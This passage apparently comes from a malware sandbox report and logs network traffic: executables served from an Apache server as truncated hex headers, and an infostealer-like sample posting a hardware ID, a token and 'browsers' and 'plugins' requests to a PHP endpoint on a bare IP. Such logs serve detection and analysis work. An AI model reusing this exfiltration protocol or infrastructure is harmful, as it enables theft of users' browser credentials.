Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 16:28:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 16:28:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 16:28:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 16:28:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 16:28:24 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJDHost: 91.202.233.158Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 37 42 46 32 43 41 39 37 35 44 32 35 39 34 32 34 38 33 34 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 48 49 49 4a 4b 45 42 47 49 44 48 49 44 42 4b 4a 44 2d 2d 0d 0a Data Ascii: ------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="hwid"917BF2CA975D2594248341------JDGHIIJKEBGIDHIDBKJDContent-Disposition: form-data; name="build"default------JDGHIIJKEBGIDHIDBKJD--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: 91.202.233.158Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="message"browsers------BGDBAKFCFHCGDGCBAAKF--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHHost: 91.202.233.158Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 49 49 49 4a 4b 46 43 41 41 45 43 41 4b 46 49 45 48 2d 2d 0d 0a Data Ascii: ------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------AFIIIIJKFCAAECAKFIEHContent-Disposition: form-data; name="message"plugins------AFIIIIJKFCAAECAKFIEH--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAEHost: 91.202.233.158Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 2d 2d 0d 0a Data Ascii: ------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="token"2d59ab1bce5ffd7f365e5c72e70ec4ec7470bf5facaaed4a3597c7198c7520ac7bfb4d44------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="message"fplugins------CGCFCBAKKFBFIECAEBAE--
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCAHost: 91.202.233.158Content-Length: 6291Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3836fd5700214436/sqlite3.dll HTTP/1.1Host: 91.202.233.158Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKECHost: 91.202.233.158Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: 91.202.233.158Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJHost: 91.202.233.158Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 35 39 61 62 31 62 63 65 35 66 66 64 37 66 33 36 35 65 35 63 37 32 65 37 30 65 63 34 65 63 37 34 37 30 62 66 35 66 61 63 61 61 65 64 34 61 33 35 39 37 63 37 31 39 38 63 37 35 32 30 61 63 37 62 66 62 34 64 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 